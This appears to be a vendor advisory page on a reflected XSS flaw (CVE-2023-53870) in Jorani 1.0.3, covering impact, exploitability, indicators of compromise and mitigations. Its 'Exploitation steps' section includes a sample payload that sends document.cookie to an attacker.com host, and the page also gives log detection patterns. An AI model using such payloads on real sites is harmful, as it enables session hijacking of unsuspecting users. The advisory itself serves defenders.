CVE-2023-53870
Jorani vulnerability analysis and mitigation

Overview

CVE-2023-53870 is a reflected cross-site scripting (XSS) vulnerability in Jorani version 1.0.3, affecting the language parameter. It allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in the context of a victim's browser session. The CVE was published on December 15, 2025, and was assigned by VulnCheck. It carries a CVSS v4.0 base score of 5.1 (Medium), as scored by VulnCheck (VulnCheck Advisory, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The root cause is insufficient sanitization of user-supplied input in the language parameter, which is reflected back into the HTML response without proper encoding. An attacker can craft a malicious URL containing a JavaScript payload in the language parameter and trick a victim into clicking it; upon loading the page, the browser executes the injected script. No authentication is required to exploit this vulnerability, but active user interaction (victim clicking a crafted link) is necessary (VulnCheck Advisory, Exploit-DB).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, enabling session cookie theft, credential harvesting, phishing via page content manipulation, or redirection to malicious sites. The primary confidentiality impact is low (limited to data accessible within the victim's browser session), with no direct integrity or availability impact on the server. The vulnerability does not provide server-side code execution or direct access to backend systems (VulnCheck Advisory, Red Hat CVE).

Exploitability

A public proof-of-concept exploit is available on Exploit-DB (EDB-51715), lowering the barrier for exploitation (Exploit-DB). The EPSS score is approximately 0.045%, indicating a low but non-zero probability of exploitation in the wild. There is no current evidence of active in-the-wild exploitation, threat actor attribution, or inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires no authentication but does require user interaction (victim must click a crafted link) (VulnCheck Advisory).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible Jorani 1.0.3 instances using search engines (e.g., Shodan, Google dorks) or by browsing to known Jorani login/language selection pages.
  2. Craft malicious URL: Construct a URL targeting the vulnerable language parameter with an XSS payload, e.g., https://target.jorani.instance/path?language=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Deliver payload: Send the crafted URL to a target user via phishing email, social engineering, or embed it in a malicious web page that the victim is likely to visit.
  4. Victim interaction: When the victim clicks the link and loads the page, the Jorani application reflects the unsanitized language parameter value into the HTML response.
  5. Script execution and session theft: The victim's browser executes the injected JavaScript, which can exfiltrate session cookies, credentials, or other sensitive browser-accessible data to an attacker-controlled server (Exploit-DB, VulnCheck Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after visiting a Jorani page; URL-encoded <script> tags or JavaScript event handlers observed in web server access logs within the language parameter.
  • Logs: Web server access logs showing requests to Jorani endpoints with suspicious values in the language parameter (e.g., containing <script>, javascript:, onerror=, or encoded variants such as %3Cscript%3E).
  • Application: Unexpected session invalidations or reports from users of being redirected to unknown sites after interacting with Jorani language selection features.

Mitigation and workarounds

Users should upgrade Jorani beyond version 1.0.3 to a patched release if available, or apply vendor-supplied security patches. As a workaround, implement a Web Application Firewall (WAF) rule to block or sanitize requests containing script injection patterns in the language parameter. Additionally, enforce strict Content Security Policy (CSP) headers on the Jorani application to limit the impact of any reflected XSS. Monitor the Jorani project for official patch releases (VulnCheck Advisory, Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related Jorani vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2023-26469CRITICAL9.8
  • Jorani logoJorani
  • cpe:2.3:a:jorani:jorani
NoYesAug 17, 2023
CVE-2023-2681HIGH8.8
  • Jorani logoJorani
  • cpe:2.3:a:jorani:jorani
NoYesOct 03, 2023
CVE-2025-67102HIGH7.6
  • Jorani logoJorani
  • cpe:2.3:a:jorani:jorani
NoNoFeb 17, 2026
CVE-2022-48118MEDIUM6.1
  • Jorani logoJorani
  • cpe:2.3:a:jorani_project:jorani
NoYesJan 27, 2023
CVE-2023-53870MEDIUM5.1
  • Jorani logoJorani
  • cpe:2.3:a:jorani:jorani
NoYesDec 15, 2025

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management